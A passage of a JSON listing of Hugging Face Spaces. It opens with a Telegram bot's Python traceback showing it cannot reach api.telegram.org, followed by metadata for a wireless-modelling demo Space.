\"/home/user/.local/lib/python3.11/site-packages/aiogram/client/bot.py\", line 3785, in set_webhook\n    return await self(call, request_timeout=request_timeout)\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"/home/user/.local/lib/python3.11/site-packages/aiogram/client/bot.py\", line 488, in __call__\n    return await self.session(self, method, timeout=request_timeout)\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"/home/user/.local/lib/python3.11/site-packages/aiogram/client/session/base.py\", line 254, in __call__\n    return cast(TelegramType, await middleware(bot, method))\n                              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"/home/user/.local/lib/python3.11/site-packages/aiogram/client/session/aiohttp.py\", line 188, in make_request\n    raise TelegramNetworkError(method=method, message=f\"{type(e).__name__}: {e}\")\naiogram.exceptions.TelegramNetworkError: HTTP Client says - ClientConnectorError: Cannot connect to host api.telegram.org:443 ssl:default [No address associated with hostname]\n\nERROR:    Application startup failed. Exiting.\n2025-11-21 02:43:42,553 - asyncio - ERROR - Unclosed client session\nclient_session: <aiohttp.client.ClientSession object at 0x7fd2eb026a50>\n", "replicas": {"requested": 1}, "devMode": false, "domains": [{"domain": "powl24-bot-downloader-telegram.hf.space", "stage": "READY"}]}, "title": "Bot Downloader Telegram", "isLikedByUser": false, "trendingScore": 0, "tags": ["docker", "region:us"], "featured": false}, {"author": "wi-lab", "authorData": {"_id": "66e255e3f29939aa66724304", "avatarUrl": "https://cdn-avatars.huggingface.co/v1/production/uploads/66e255e3f29939aa66724304/yXZ7lnE3JaHNVj5nrtk-Q.png", "fullname": "Wireless Intelligence Lab", "name": "wi-lab", "type": "user", "isPro": false, "isHf": false, "isHfAdmin": false, "isMod": false, "followerCount": 21}, "colorFrom": "indigo", "colorTo": "red", "createdAt": "2024-09-17T21:59:08.000Z", "emoji": "üõ∞", "id": "wi-lab/lwm-interactive-demo", "lastModified": "2025-11-21T02:43:06.000Z", "likes": 1, "pinned": false, "private": false, "sdk": "gradio", "repoType": "space", "runtime": {"stage": "BUILDING", "hardware": {"current": null, "requested": "cpu-basic"}, "storage": null, "gcTimeout": 172800, "replicas": {"requested": 1}, "devMode": false, "domains": [{"domain": "wi-lab-lwm-interactive-demo.hf.space", "stage": "READY"}]}, "title": "LWM (Large Wireless Model)", "isLikedByUser": false, "ai_short_description": "Generate confusion matrices for beam prediction and LoS/NLoS classification", "ai_category": "Image Generation", "trendingScore": 0, "tags": ["gradio", "region:us"], "featured": false}], "numItemsPerPage": 24, "numTotalItems": 886796, "pageIndex": 0}